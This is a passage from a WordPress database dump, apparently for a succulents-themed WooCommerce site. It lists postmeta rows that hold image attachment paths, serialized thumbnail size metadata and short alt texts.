s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2179,2516,'_wp_attachment_image_alt','o'),(2180,2517,'_wp_attached_file','2018/02/h3-slide2-graphic3.png'),(2181,2517,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:399;s:6:\"height\";i:320;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphic3.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide2-graphic3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic3-300x241.png\";s:5:\"width\";i:300;s:6:\"height\";i:241;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic3-399x300.png\";s:5:\"width\";i:399;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic3-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide2-graphic3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2182,2517,'_wp_attachment_image_alt','o'),(2183,4266,'_wp_attachment_image_alt','l'),(2184,4267,'_wp_attachment_image_alt','a'),(2185,4268,'_wp_attachment_image_alt','o'),(2186,4269,'_wp_attachment_image_alt','a'),(2187,4270,'_wp_attachment_image_alt','a'),(2188,4275,'_wp_attachment_image_alt','a'),(2189,4277,'_wp_attachment_image_alt','a'),(2190,4277,'portfolio_single_masonry_image_size','small-box'),(2191,4277,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(2192,4278,'_wp_attachment_image_alt','a'),(2193,4278,'portfolio_single_masonry_image_size','large-height'),(2194,4278,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(2195,4280,'_wp_attachment_image_alt','a'),(2196,4280,'portfolio_single_masonry_image_size','large-height'),(2197,4280,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(2198,4282,'_wp_attachment_image_alt','a'),(2199,4282,'portfolio_single_masonry_image_size','small-box'),(2200,4282,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(2201,4283,'_wp_attachment_image_alt','a'),(2202,4284,'_wp_attachment_image_alt','a'),(2203,4284,'portfolio_single_masonry_image_size','small-box'),(2204,4284,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(2205,4333,'_wp_attachment_image_alt','a'),(2206,4335,'_wp_attachment_image_alt','a'),(2207,4340,'_wp_attachment_image_alt','a'),(2208,2518,'_wp_attached_file','2018/02/h3-slide2-graphic1.png'),(2209,2518,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:324;s:6:\"height\";i:203;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphic1.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide2-graphic1-300x203.png\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic1-300x188.png\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic1-300x203.png\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide2-graphic1-300x203.png\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2210,2518,'_wp_attachment_image_alt',''),(2211,2521,'_wp_attached_file','2018/02/h3-slide3-graphic2.png'),(2212,2521,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:502;s:6:\"height\";i:369;s:4:\"file\";s:30:\"2018/02/h3-slide3-graphic2.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide3-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic2-300x221.png\";s:5:\"width\";i:300;s:6:\"height\";i:221;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic2-502x300.png\";s:5:\"width\";i:502;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide3-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2213,2521,'_wp_attachment_image_alt','o'),(2214,2522,'_wp_attached_file','2018/02/h3-slide2-graphic6.png'),(2215,2522,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:91;s:6:\"height\";i:83;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphic6.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2216,2522,'_wp_attachment_image_alt','o'),(2217,2524,'_wp_attached_file','2018/02/h3-slide2-graphic11.png'),(2218,2524,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:814;s:6:\"height\";i:702;s:4:\"file\";s:31:\"2018/02/h3-slide2-graphic11.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h3-slide2-graphic11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-600x517.png\";s:5:\"width\";i:600;s:6:\"height\";i:517;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-300x259.png\";s:5:\"width\";i:300;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-768x662.png\";s:5:\"width\";i:768;s:6:\"height\";i:662;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-814x550.png\";s:5:\"width\";i:814;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-550x702.png\";s:5:\"width\";i:550;s:6:\"height\";i:702;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h3-slide2-graphic11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-600x517.png\";s:5:\"width\";i:600;s:6:\"height\";i:517;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2219,2524,'_wp_attachment_image_alt','o'),(2220,2533,'_wp_attached_file','2018/02/succulents-logo-veliki.png'),(2221,2533,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:778;s:6:\"height\";i:342;s:4:\"file\";s:34:\"2018/02/succulents-logo-veliki.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"succulents-logo-veliki-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-600x264.png\";s:5:\"width\";i:600;s:6:\"height\";i:264;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-300x132.png\";s:5:\"width\";i:300;s:6:\"height\";i:132;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-768x338.png\";s:5:\"width\";i:768;s:6:\"height\";i:338;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-550x342.png\";s:5:\"width\";i:550;s:6:\"height\";i:342;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-550x342.png\";s:5:\"width\";i:550;s:6:\"height\";i:342;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"succulents-logo-veliki-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-600x264.png\";s:5:\"width\";i:600;s:6:\"height\";i:264;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"succulents-logo-veliki-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2222,2533,'_wp_attachment_image_alt','o'),(2223,2536,'_wp_attached_file','2018/02/h3-slide2-graphic7.png'),(2224,2536,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:209;s:6:\"height\";i:276;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphic7.png\";s:5:\"sizes\";a:4:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic7-209x240.png\";s:5:\"width\";i:209;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2225,2536,'_wp_attachment_image_alt','o'),(2226,2537,'_wp_attached_file','2018/02/back-papaya.jpg'),(2227,2537,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2200;s:6:\"height\";i:1100;s:4:\"file\";s:23:\"2018/02/back-papaya.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"back-papaya-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"back-papaya-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"back-papaya-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"back-papaya-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"back-papaya-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"back-papaya-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"back-papaya-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"back-papaya-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"back-papaya-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"back-papaya-1536x768.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:25:\"back-papaya-2048x1024.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"back-papaya-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:24:\"back-papaya-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:24:\"back-papaya-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:25:\"back-papaya-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"back-papaya-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"back-papaya-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"back-papaya-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2228,2537,'_wp_attachment_image_alt',''),(2229,2538,'_wp_attached_file','2018/02/h2-slide3-graphic-1.png'),(2230,2538,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:504;s:6:\"height\";i:515;s:4:\"file\";s:31:\"2018/02/h2-slide3-graphic-1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slide3-graphic-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-1-294x300.png\";s:5:\"width\";i:294;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-1-504x300.png\";s:5:\"width\";i:504;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slide3-graphic-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2231,2538,'_wp_attachment_image_alt','o'),(2232,2539,'_wp_attached_file','2018/02/h2-slide3-graphic-2.png'),(2233,2539,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:639;s:6:\"height\";i:422;s:4:\"file\";s:31:\"2018/02/h2-slide3-graphic-2.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-600x396.png\";s:5:\"width\";i:600;s:6:\"height\";i:396;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-300x198.png\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-550x422.png\";s:5:\"width\";i:550;s:6:\"height\";i:422;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-550x422.png\";s:5:\"width\";i:550;s:6:\"height\";i:422;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-600x396.png\";s:5:\"width\";i:600;s:6:\"height\";i:396;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2234,2539,'_wp_attachment_image_alt','o'),(2235,2540,'_wp_attached_file','2018/02/h2-slide3-graphic-3.png'),(2236,2540,'_w